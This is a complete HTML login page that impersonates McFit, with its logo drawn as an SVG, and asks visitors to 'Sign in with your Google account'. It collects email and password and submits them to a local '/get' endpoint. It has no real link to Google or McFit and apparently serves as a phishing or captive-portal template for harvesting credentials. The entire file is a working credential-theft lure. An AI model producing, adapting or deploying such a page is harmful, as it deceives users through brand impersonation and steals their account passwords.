<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.brand-name {
  font-size: 42px;
  color: #FFDD00;
  margin-left: 10px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #FFDD00;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #FFDD00;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #FFDD00;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="150px" height="150px" viewBox="0 0 512 512" version="1.1">
  <title>McFit / DE / logo</title>
  <defs>
    <linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="linearGradient-1">
      <stop stop-color="#FFDD00" offset="0%"></stop>
      <stop stop-color="#F6B222" offset="100%"></stop>
    </linearGradient>
  </defs>
  <g id="McFit-/-DE-/-logo" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
    <rect fill="#FFDD00" x="0" y="0" width="512" height="512"></rect>
    <rect id="Rectangle" fill="url(#linearGradient-1)" x="0" y="0" width="512" height="512"></rect>
    <g id="logo" transform="translate(91.000000, 84.000000)" fill="#FEFEFE" fill-rule="nonzero">
      <path d="M83.9425479,195.976147 L105.935762,218.368055 C107.422106,219.892767 108.90845,221.417478 110.308048,222.943858 C111.971218,224.768841 113.722802,226.753969 115.819697,229.196177 C119.789953,233.833702 123.23807,238.070866 126.357556,242.146216 C128.239257,244.61011 129.829028,246.793751 131.218617,248.82392 C131.985977,249.944933 132.729983,251.075955 133.42728,252.20531 L133.42728,252.20531 L134.416508,253.876821 C134.648384,254.302205 134.878592,254.807662 135.098791,255.374841 C135.916197,257.488419 136.396631,259.938967 136.488381,262.457911 C136.576794,264.863419 136.309886,267.347331 135.699334,269.84292 C135.125482,272.185037 134.226336,274.582204 133.030255,276.967694 C132.464744,278.088707 131.822496,279.226402 131.128536,280.329066 L131.128536,280.329066 L128.856482,283.795533 C125.716977,288.509794 122.467373,293.083929 119.196083,297.396161 C111.979559,306.924774 104.833099,315.137198 97.3463311,322.507193 C92.7021329,327.106351 88.7835907,330.627868 85.0101796,333.593882 C83.9358752,334.446319 82.8382163,335.262057 81.7172029,336.059444 C80.5845123,336.870177 79.4418127,337.635869 78.3224675,338.334834 C75.8585736,339.867887 69.7146864,343.235931 67.3759055,344.173446 C67.3258603,344.191796 67.1757246,344.246845 66.9772118,344.318577 C63.1370738,344.597162 59.2568996,344.336927 56.2008036,343.230927 C51.7467773,341.61947 48.6656588,338.399893 46.8189894,334.090998 C43.2057232,325.666716 43.8546431,311.692417 45.362673,300.937695 C48.3370284,279.731859 54.4842519,260.728014 61.3754813,242.958618 C67.8163036,226.345266 75.6633971,210.724479 83.9425479,195.976147 L83.9425479,195.976147 Z M36.5313564,134.393572 C48.323683,134.415498 60.1443685,134.527266 71.9183451,134.709097 C74.7342239,134.777492 77.54343,135.231236 80.2825727,135.981914 C83.0317245,136.760952 85.7908854,137.735166 88.4733102,138.817811 C93.8581779,140.989775 99.0428647,143.690549 104.232556,146.474733 L108.136085,148.56996 L110.104531,149.607565 L112.004582,150.595124 L119.678185,155.010782 L135.038737,163.825417 L165.786532,181.401305 L181.163766,190.185913 L182.124634,190.734742 L182.21138,190.781451 C182.236402,190.799801 182.271434,190.819819 182.269766,190.819819 L182.50331,190.971623 L182.968731,191.270226 L184.828746,192.47298 L188.54377,194.873484 C191.019342,196.474931 193.483236,198.081383 195.932116,199.709522 C200.824872,202.967467 205.647565,206.305484 210.298436,209.843683 C211.457817,210.726147 212.617199,211.625293 213.746553,212.527776 L215.454764,213.909024 L217.13962,215.303618 C219.361629,217.171974 221.523583,219.105388 223.475347,221.148902 C223.707224,221.385783 223.984141,221.691059 224.211012,221.932944 L224.948346,222.742009 C225.437121,223.279161 225.917555,223.81965 226.389649,224.365143 C227.333835,225.451125 228.241322,226.555456 229.092091,227.688147 C230.791961,229.950192 232.271632,232.340686 233.339264,234.866302 C234.408564,237.386914 235.047475,240.045985 235.125879,242.726741 C235.167583,244.064617 235.072498,245.409166 234.848962,246.737033 C234.82394,246.888837 234.790576,247.042309 234.762217,247.192445 C233.68124,251.928393 231.619376,256.095493 229.245564,259.858895 C222.077417,271.229173 211.936583,279.398224 201.672305,287.757447 C194.76773,293.380864 187.349357,298.560546 174.99152,305.705338 C131.575607,330.79969 91.9848178,339.759456 77.725261,342.561989 C78.6744524,342.019832 79.501867,341.531057 80.0873963,341.165727 C81.2667958,340.430062 82.4695497,339.626002 83.65729,338.775232 C84.8183396,337.947818 85.9643755,337.095381 87.077048,336.214584 C87.5174461,335.867604 87.9611806,335.512283 88.4065832,335.150289 C92.5536654,332.195952 96.5439391,329.016411 100.334032,325.611666 C108.739964,317.974763 116.340168,309.488759 123.331487,300.564024 C126.821309,296.093316 130.164331,291.509172 133.372231,286.836615 L134.571648,285.075023 L135.162182,284.199231 L135.761057,283.283403 C136.550103,282.050622 137.289105,280.776137 137.959711,279.46662 C139.309264,276.845917 140.385237,274.060066 141.090875,271.162446 C142.503819,265.375548 142.428751,259.113221 140.221756,253.378036 C139.939834,252.662389 139.621213,251.953415 139.232528,251.242773 L138.94727,250.74232 L138.672021,250.270227 L138.108178,249.339386 C137.349159,248.106604 136.560112,246.905519 135.752716,245.722783 C134.136255,243.360648 132.44973,241.068576 130.726506,238.808199 C127.275052,234.294118 123.68514,229.91516 120.003479,225.612938 C118.160146,223.460992 116.298463,221.330733 114.380062,219.225497 C113.899628,218.700022 113.410853,218.169542 112.912069,217.647404 L111.437402,216.117688 L108.484733,213.084946 L96.6390251,201.024043 L90.706996,195.005269 L87.7393134,191.99755 C86.7434131,190.979964 85.7024721,189.972386 84.6732084,188.998172 C80.5327989,185.096312 76.2989717,181.364605 72.0467945,177.647912 C69.92154,175.792902 67.7829401,173.952905 65.6293267,172.127922 L62.3997406,169.393784 L60.7766067,168.037558 L59.9608693,167.358611 L59.5521665,167.023308 L59.346981,166.853154 L59.2435542,166.768077 L59.1901726,166.724705 C59.1818317,166.716364 59.1768272,166.713027 59.1734908,166.711359 L59.170363,166.708857 C59.1734908,166.709691 59.1834999,166.716364 59.1568091,166.696346 C58.067491,165.683764 56.988182,164.729568 55.8871868,163.770367 C54.7645052,162.792817 53.6334828,161.826944 52.4874469,160.879421 C50.2003794,158.976033 47.8682713,157.131032 45.4961269,155.334408 C43.1156417,153.552798 40.6967885,151.819564 38.2362309,150.146385 C35.7690006,148.481547 33.2583978,146.878431 30.6927452,145.36206 C28.1320971,143.844021 25.5163993,142.407723 22.8256336,141.116556 C22.3335221,140.879675 21.836406,140.654471 21.33929,140.4276 C18.9771547,139.204828 16.7751642,138.212264 14.6649233,137.438231 C13.2703293,136.932774 10.889844,136.524071 8.74290329,136.230472 C10.7130175,135.114463 13.3103655,134.899269 16.658392,134.765815 C19.2390581,134.66072 22.5320349,134.547284 26.220369,134.425507 C29.6551406,134.398817 33.0932485,134.393572 36.5313564,134.393572 Z M294.297702,0.137448802 C295.580528,-0.0493867572 296.918404,-0.0644003289 298.301321,0.209180312 C300.858633,0.716305402 302.950524,2.2226671 304.610357,4.00928214 C307.831603,7.47908539 310.135352,12.2483967 311.968676,16.9476446 C315.802141,26.7665206 318.321085,37.8682228 320.377944,49.131738 C326.663626,83.5728716 329.459487,121.34535 329.678018,161.449936 C329.749749,174.571798 330.001644,188.200785 329.999992,201.719672 C329.998307,215.041715 329.322697,261.752273 328.627068,271.342609 C328.315119,275.638159 328.461918,282.260812 323.936161,280.399129 C322.262981,279.710173 320.493048,278.332261 318.841555,277.082798 C317.203408,275.843344 283.66142,248.023196 268.707903,234.711162 C262.979391,229.61322 255.749522,224.597019 251.887698,217.810885 C249.852525,214.237655 248.342827,210.108923 246.791424,206.085285 C236.151807,178.458645 225.782433,150.53507 216.046966,122.392964 L216.046966,122.392964 L216.195433,122.102701 L216.954453,120.609685 L217.741831,119.10666 L219.323261,116.100609 L232.008061,92.0705532 C236.236883,84.0616468 240.495733,76.0694221 244.774601,68.0955473 C246.788088,64.3688451 248.816588,60.6504839 250.893466,56.973827 C251.178724,56.4883881 251.462313,56.0046175 251.749239,55.5208468 C252.326428,54.548301 252.908621,53.5790916 253.502491,52.6148866 L253.502491,52.6148866 L256.393438,47.9273159 C257.210843,46.601117 258.028249,45.27325 258.862336,43.9470512 C264.125427,35.4877376 269.106597,28.1477692 274.091102,21.5084341 C275.484028,19.6584284 276.883627,17.8601362 278.249862,16.1636026 C278.957168,15.2878109 279.676151,14.4236964 280.410148,13.5612501 C281.129131,12.7021402 281.866464,11.8563756 282.615475,11.0222883 C283.366153,10.188201 284.133514,9.37413178 284.915888,8.56840343 C285.689921,7.76934778 286.478967,6.99031022 287.301377,6.23295894 C287.648358,5.91266941 288.717658,4.86338756 290.052197,3.55720681 C290.912975,2.71477862 292.043998,1.60377431 293.166679,0.512788096 C293.21172,0.49610635 293.253424,0.472751905 293.296797,0.456070159 C293.628764,0.33429341 293.962399,0.230866582 294.297702,0.137448802 Z M5.83027037,139.233187 C8.90304805,139.570158 12.1292978,140.067274 13.5222236,140.572731 C15.9093815,141.448523 18.4299934,142.614577 21.2291905,144.13762 C23.5896576,145.425451 25.9985018,146.891776 28.589177,148.616669 C30.8762444,150.149721 33.1833299,151.806219 35.6472239,153.682915 C37.8875824,155.379449 40.1813225,157.202764 42.4700582,159.109487 C44.598649,160.864407 46.7722805,162.721086 49.1093932,164.779613 C50.807595,166.28097 55.4000798,170.55817 57.283449,172.318094 C57.3184806,175.874643 57.398553,182.537332 57.493639,185.952086 C57.6637928,192.067614 58.2376448,198.274892 55.7954372,202.123371 C54.6744238,203.888299 53.1747348,205.489747 51.7517818,207.136235 C41.7994519,218.653313 13.2469748,250.400345 8.8146348,255.089584 C7.63189898,256.339046 3.77174286,261.118367 2.58733887,257.515109 C1.84500115,255.256401 1.78828321,252.262028 1.6181294,249.509539 C0.40509953,230.001338 0.0283736488,187.932154 0.00122924453,186.169265 L4.26831114e-13,186.11223 C0.316953182,170.674942 0.193508258,156.078414 3.63828889,144.387846 C4.21047279,142.441086 4.92445154,140.691171 5.83027037,139.233187 Z M282.607134,4.52808445 C282.014932,5.09359566 281.417725,5.65910686 280.850546,6.24630433 C280.041481,7.08039165 279.245762,7.9261562 278.468393,8.79027066 C277.692691,9.65104877 276.932004,10.5268405 276.191334,11.4076367 C275.447328,12.2867647 274.708327,13.1725654 273.984339,14.0700434 C272.593082,15.794936 271.171797,17.6215872 269.755516,19.5032882 C264.712625,26.2243638 259.676405,33.6427364 254.366605,42.1754497 C253.53085,43.5049849 252.706772,44.842861 251.884362,46.1790689 L251.884362,46.1790689 L248.995083,50.8649714 C248.389536,51.8458581 247.797334,52.8300811 247.210136,53.8176405 C244.832987,57.8262642 242.52757,61.8782604 240.393975,65.6583441 C236.135125,73.1868163 232.061442,80.6418887 227.255431,89.5249187 C223.42697,96.6480244 218.91289,105.072306 214.465536,113.543297 L214.465536,113.543297 L208.221559,125.684272 C206.174708,129.732932 204.136199,133.791601 202.119376,137.865283 C197.763772,146.691595 193.953661,154.773902 190.47218,162.574286 C187.322667,169.637338 184.336634,176.833843 181.587482,183.99198 L181.587482,183.99198 L122.34226,150.411625 L114.925555,145.962603 C128.8031,126.251452 170.265581,69.945553 182.670128,56.6518692 C185.981454,53.1003254 189.369517,49.7589716 193.019483,46.7862844 C196.742849,43.7552111 201.26527,41.5699023 205.957846,39.4279661 C224.804883,30.820185 265.791934,12.0382067 282.607134,4.52808445 Z" id="mcfit-logo"></path>
    </g>
  </g>
</svg>




    <div class="brand-name"><b>McFIT</b></div>
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
 account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
